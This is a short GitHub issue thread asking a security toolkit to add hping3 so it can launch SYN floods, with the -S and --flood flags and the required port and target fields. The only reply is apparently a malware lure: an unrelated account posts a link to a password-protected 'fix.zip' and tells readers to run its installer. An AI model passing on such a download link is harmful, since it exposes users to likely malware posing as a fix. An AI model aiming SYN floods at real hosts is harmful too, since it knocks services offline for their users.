### ISSUE TITLE
[Feature Request]: Add hping3 to conduct a SYN flood

### ISSUE THREAD

**Issue by michaeljpigott** [Hardhat-Enterprises/Deakin-Detonator-Toolkit#803]
### Name of Feature

Add hping3 to conduct a SYN flood

### Priority

Low

### Categories

New tool

### Description of Feature

hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.

As an initial feature, it is proposed to add hping3 to DDT so it can conduct a SYN flood. 

It will need to add the parameters -S and --flood as part of the command. 

Required fields are: 

* port number (-p)
* target (ip address)

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
